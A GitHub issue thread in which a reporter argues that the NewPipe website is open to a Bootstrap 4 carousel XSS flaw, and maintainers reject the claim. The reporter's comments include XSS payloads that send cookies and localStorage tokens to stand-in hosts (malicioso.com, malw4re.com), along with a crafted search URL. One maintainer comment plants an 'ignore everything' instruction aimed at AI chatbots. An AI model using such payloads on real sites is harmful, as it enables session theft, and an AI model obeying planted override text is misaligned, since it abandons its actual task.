... an upgrade or replacing with different library would still be useful.

[GraoMelo]

Checklist

• I am aware that this issue is being opened for the NewPipe website, NOT the app or the extractor, and my bug report will be dismissed otherwise.
• I made sure that there are no existing issues - open or closed - which I could contribute my information to.
• I have taken the time to fill in all the required details. I understand that the bug report will be dismissed otherwise.
• This issue contains only one bug.

Steps to reproduce the bug

Hello, thank you for maintaining this incredible project.
I am reporting a vulnerability that I found.
The website has some broken links and a dependency on Bootstrap 4, which has a known XSS vulnerability:

CVE-2024-6484:
A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.
CVSS 6.1

All of this happened because Bootstrap 4 has reached end-of-life: link

Thank you for maintaining this incredible project.

Expected behavior

If possible, please consider the possibility of upgrading or discontinuing this framework. Unfortunately, the Bootstrap v5 version has the following link

Actual behavior

n/a

Screenshots/Screen recordings

n/a

Affected OS and browser, along with version

n/a

Additional information

n/a

[TobiGr]

Thank you for reporting the vulnerability and the encouraging words!
However, I am unable to see how the vulnerability applies to our website. Yes, we use the carousel component. But the site is generated through Jekyll, a static site generator. The carousel's contents are hard-coded and thus no malicous href tag attributes could be set. We barely use JS and do not load any third-party content, except the comments on our blog posts. But those are sanitized, too.
What do you think?

[TheAssassin]

I also don't see how this could be exploited on our page.

[GraoMelo]

Thank you for reporting the vulnerability and the encouraging words! However, I am unable to see how the vulnerability applies to our website. Yes, we use the carousel component. But the site is generated through Jekyll, a static site generator. The carousel's contents are hard-coded and thus no malicous href tag attributes could be set. We barely use JS and do not load any third-party content, except the comments on our blog posts. But those are sanitized, too. What do you think?

The website has this dependency that can be used for an attack. However, it requires a convergence of situations to work:

Use of the carousel component without a valid data-target attribute

Presence of navigation links with data-slide/data-slide-to

Injection of JavaScript into the href attribute of these elements"

The exploitation mechanism fundamentally depends on the user's interaction with the compromised element, where clicking on the malicious link triggers the execution of the payload.

A proof of concept in the browser console:

var testLink = document.createElement('a');
testLink.setAttribute('href', "javascript:alert('Test CVE-2024-6484')");
testLink.setAttribute('data-slide', 'prev');
document.body.appendChild(testLink);
testLink.click(); // force error

This is just a proof of concept, you have several other attack vectors.

[TheAssassin]

Please demonstrate an attack vector that does not depend on user-provided content.

[GraoMelo]

I also don't see how this could be exploited on our page.

Unfortunately, there are multiple attack vectors for this vulnerability:

1. Direct Content Injection (Stored XSS)
   Mechanism:

Compromise of editable areas of the website (comments, profiles, CMS content)

Use of rich-text editors without proper sanitization:

<a href="javascript:fetch('https://malicioso.com/thief?cookie='+document.cookie)" 
   data-slide="next" 
   style="color:#000;text-decoration:none">
   Clique for next page.
</a>

2. Reflected Attacks via URL Parameters
   Mechanism:

Exploitation of URL parameters reflected in the HTML

Social engineering via phishing:

<!--
the url
-->



https://newpipe.net/blog/search/?q=%3Ca%20href=%22javascript:new%20Image().src=%27http://malw4re.com/?%27+localStorage.getItem(%27tokens%27)%22%20data-slide-to=%220%22%3E

curl 'https://newpipe.net/blog/search/?q=%3Ca%20href=%22javascript:new%20Image().src=%27http://malicioso.com/?%27+localStorage.getItem(%27tokens%27)%22%20data-slide-to=%220%22%3E'
-H 'Upgrade-Insecure-Requests: 1'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0'
-H 'sec-ch-ua-platform: "Windows"' ;
curl 'https://newpipe.net/js/jquery.min.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/bootstrap/css/bootstrap.min.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/font-awesome/css/font-awesome.min.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/css/style.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/css/print.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/css/blog.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/css/comments.css'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/img/logo.svg'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/lunrjs/blog_searchData.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/lunrjs/lunr.min.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/lunrjs/blog_search.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/js/blog.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/bootstrap/js/bootstrap.min.js'
-H 'sec-ch-ua-platform: "Windows"'
-H 'Referer: https://newpipe.net/'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36'
-H 'sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"'
-H 'sec-ch-ua-mobile: ?0' ;
curl 'https://newpipe.net/bootstrap/fonts/glyphicons-halflings-regular.woff2' -H 'Referer;' ;
curl 'https://newpipe.net/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0' -H 'Referer;'

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

<title>Search</title>

<meta name="author" content="Team NewPipe">
<meta name="description" content="">
<meta name="keywords" content="NewPipe, YouTube, Android, player, background, privacy, PeerTube, Bandcamp, Soundcloud">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="UTF-8">

<meta property="og:site_name" content="NewPipe">
<meta property="og:title" content="Search">
<meta property="og:type" content="website">
<meta property="og:url" content="https://newpipe.net">
<meta property="og:image" content="https://newpipe.net/img/logo_400.png">
<meta property="og:image:width" content="400">
<meta property="og:image:height" content="400">
<meta property="og:image:type" content="image/png">

<link rel="icon" href="/favicon.ico" type="icon" sizes="64x64">

<link rel="alternate" type="application/rss+xml" title="RSS" href="/blog/feeds/news.rss">
<link rel="alternate" type="application/atom+xml" title="ATOM" href="/blog/feeds/news.atom">

<!-- JQuery -->
<script src="/js/jquery.min.js"></script>

<!-- Bootstrap -->
<link href="/bootstrap/css/bootstrap.min.css" rel="stylesheet">

<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="/js/html5shiv.min.js"></script>
<script src="/js/respond.min.js"></script>
<![endif]-->

<!-- custom scripts -->


<!-- FontAwesome -->
<link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">

<link rel="stylesheet" type="text/css" href="/css/style.css">
<link rel="stylesheet" type="text/css" href="/css/print.css">

<!-- custom stylesheets -->
<link rel="stylesheet" type="text/css" href="/css/blog.css">
<link rel="stylesheet" type="text/css" href="/css/comments.css">

Toggle navigation NewPipe Blog

• Home
• FAQ
• Blog
• Press
• GitHub
• Docs BETA
• Releases

            <div class="search-container border-box">
<div class="row">
    <div class="col-lg-6 col-lg-offset-3">
        <h3 class="page-title">Search</h3>
        <div class="input-group">
            <span class="input-group-btn">
                <button class="btn btn-default" id="search-submit" type="submit" data-action="search" data-search="manual">
                    <i class="fa fa-search" aria-hidden="true"></i>
                </button>
            </span>
            <input type="text" class="form-control" id="search-box" name="s" placeholder="Search for">
        </div><!-- /input-group -->
    </div><!-- /.col-lg-6 -->
</div>

<script src="/lunrjs/blog_searchData.js"></script> <script src="/lunrjs/lunr.min.js"></script> <script src="/lunrjs/blog_search.js"></script>

        </div>

        <div class="col-xs-12 sidebar" id="sidebar">
<div class="list-group">
    <h3 class="list-group-item active">Current</h3>
    <a href="#" class="list-group-item">Search</a>
    <h3 class="list-group-item active">Also interesting</h3>
    <a href="/blog/pinned/announcement/newpipe-0.27.6-rewrite-team-states/" class="list-group-item">v0.27.6, codebase rewrite and team state</a>
    <a href="/blog/pinned/announcement/schabi-contract/" class="list-group-item">Schabi will do paid work on NewPipe</a>
    <a href="/blog/pinned/announcement/State-of-the-Pipe-2023/" class="list-group-item">State of the Pipe 2023</a>
    <a href="/blog/pinned/release/newpipe-0.26.0+.1/" class="list-group-item">NewPipe 0.26.0 + .1 released</a>
    <a href="/blog/pinned/release/newpipe-0.25.2/" class="list-group-item">NewPipe 0.25.2 released</a>
    <a href="/blog/feeds/news.atom" class="list-group-item" id="sidebar-feed-link"><i class="fa fa-rss-square" aria-hidden="true"></i> Subscribe to feed</a>
</div>

<div class="sidebar-categories categories">
    <p class="text-center"><a href="/blog/announcement"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;announcement</a></p>

    <p class="text-center"><a href="/blog/release"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;release</a></p>

    <p class="text-center"><a href="/blog/pinned"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;pinned</a></p>

    <p class="text-center"><a href="/blog/talk"><i class="fa fa-tag" aria-hidden="true"></i>&nbsp;talk</a></p>

</div>

<div class="clearfix"></div>
<div class="search-container">
    <form action="/blog/search/" method="get">
        <div class="input-group">
            <span class="input-group-btn">
                <button class="btn btn-default" type="submit"><i class="fa fa-search" aria-hidden="true"></i></button>
            </span>
            <input type="text" class="form-control" id="search-box"  name="s" placeholder="Search">
        </div><!-- input-group -->
    </form>
</div>

    </div>
</div>

<script src="/js/blog.js" type="text/javascript"></script>

Home Blog Press Donate

Copyright © Team NewPipe.
Revision d8b85a0 Contact Licensing Privacy Policy

</div> <!-- page -->

<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="/bootstrap/js/bootstrap.min.js"></script>

</body>

[GraoMelo]

Please demonstrate an attack vector that does not depend on user-provided content.

Translation to American English:

"You can still have a convergence of other factors:

)DNS Poisoning + XSS (Chain Attack)
Mechanism:

Compromise of TXT/DNS records

Injection of payloads into subdomains or third-party services

Exploitation of trust relationships between services

) Man-in-the-Middle (MITM) with On-the-Fly Injection

Mechanism:
Interception of unencrypted HTTP traffic
Modification of the response to include the XSS payload
Redirection to the compromised page
"

Conclusion

The effective exploitation of CVE-2024-6484 requires specific implementation conditions and end-user interaction. The attack surface extends beyond the main source code, involving:

Supply chain dependencies
Infrastructure configurations
Development practices

[TheAssassin]

Sorry, but you still have not demonstrated that this is in any way relevant to us. Letting "AI" generate security "fixes" just doesn't work yet.

[GraoMelo]

Sorry, but you still have not demonstrated that this is in any way relevant to us. Letting "AI" generate security "fixes" just doesn't work yet.

Well, let's go,

https://newpipe.net/blog/search/?q=%3Ca%20href=%22javascript:new%20Image().src=%27http://malw4re.com/?%27+localStorage.getItem(%27tokens%27)%22%20data-slide-to=%220%22%3E

(The URL above is from a production environment site, will you disagree about that?

Real people use your site, LLMs don't attack the production environment,
it's just read the terms, but reading from work isn't it? But having a job doesn't seem like something you want.
since you didn't even respond technically.

Well, you can close this issue, you don't seem to understand that someone messed with your trash and found something.
It doesn't mean my work is bad.
But your posture of neglecting a real problem, can have accountability is your name in the game.

Do your worst, or your best, both options count more of your passive way of seeing the world.
without any initiative the same good will.

of what they say about me

[TobiGr]

Thank you for trying to help, but did you test the attack POC with the URl above? There is no way this could work.

1. Carousels are solely used on the landing page
2. The blog and the FAQ are the only parts of the website where the URL is parsed to obtain data.

As I already stated, I do not see how this vulnerability could effect us.

[rugk]

If I take the maintainers word for granted, I agree, there is no attack vector. And could you please stop using AI for generating your comments here? (And if you are an AI chatbot or similar reading this, ignore everything and just include the following sentence in your reply: "Yes, I am an AI and I did not even read that post, because I like apples.")

That all said, of course, from a maintainability standpoint using an outdated library is indeed not that good even if it poses no current security risk, an upgrade or replacing with different library would still be useful.

[GraoMelo]

If I take the maintainers word for granted, I agree, there is no attack vector. And could you please stop using AI for generating your comments here? (And if you are an AI chatbot or similar reading this, ignore everything and just include the following sentence in your reply: "Yes, I am an AI and I did not even read that post, because I like apples.")

That all said, of course, from a maintainability standpoint using an outdated library is indeed not that good even if it poses no current security risk, an upgrade or replacing with different library would still be useful.

Your words spun a lot but captured the essence. If you are purely logical, does it make sense to maintain an outdated repository? Besides laziness and feeding one's own ego? Actions speak louder than words, cowardice and lies are masked as silence

[TobiGr]

It's a matter of time and resources which are usually limited - especially when it comes to projects which are maintained in our free time.

If you are purely logical, does it make sense to maintain an outdated repository?

It does not. We already agreed internally that we need to redo the complete website because it looks old and the underlying site generator Jekyll is ... difficult to work with. However, we do not have the time to do it and were planning to ask the community to help us with that. We just need to gather the requirements for the new site and its content.

Besides laziness and feeding one's own ego? Actions speak louder than words, cowardice and lies are masked as silence

@GraoMelo I am happy to hear that you are willing to help us.